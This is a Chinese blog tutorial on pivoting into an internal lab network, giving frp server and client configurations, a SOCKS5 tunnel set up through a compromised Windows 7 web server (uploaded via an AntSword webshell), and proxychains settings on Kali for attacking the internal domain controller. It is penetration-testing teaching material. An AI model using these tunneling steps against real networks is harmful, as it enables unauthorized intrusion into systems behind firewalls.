内网渗透--frp代理设置与proxychains代理设置

标题内网渗透–frp代理设置与proxychains代理设置

内网服务器内网IP地址外网IP地址
内网web服务器(windows 7)192.168.52.143192.168.213.138
内网域控服务器192.168.52.138
外网服务器外网IP地址外网V8网卡
外网kali192.168.213.132
外网windows攻击机192.168.0.137192.168.213.1

frps服务端配置

修改外网windows11主机上的frps.ini文件为:
在这里插入图片描述

[common]
bind_port = 7000                     # 外网监听端口

启动监听:

./frps -c ./frps.ini

在这里插入图片描述

frpc客户端配置

将经过修改的windows版本的frp通过蚁剑终端上传到wen服务器上
在这里插入图片描述

[common]
server_addr = 192.168.0.137                 # 外网windows地址
server_port = 7000                          # 外网监听端口

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6000
 
[socks5]                                   # socks5代理设置,kali使用该代理加入战斗
type = tcp
plugin = socks5
remote_port = 5000

frp连接建立

客户端主动启动链接

frpc.exe -c frpc.ini

在这里插入图片描述
服务端的外网window11连接成功
在这里插入图片描述

kali socks 代理连接

由于刚刚在frpc客户端配置文件中写入了socks5代理,此时我们可以使用kali中的proxychains,设置socks5代理加入网络中
只需修改 /etc/proxychains4.conf 文件的最后一行就可以了
在这里插入图片描述

socks5 192.168.213.1 5000        # 192.168.213.1是外网win11的v8网卡地址

这样,我们就可以通过kali和自己的win11主机发动对内网的攻击了

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值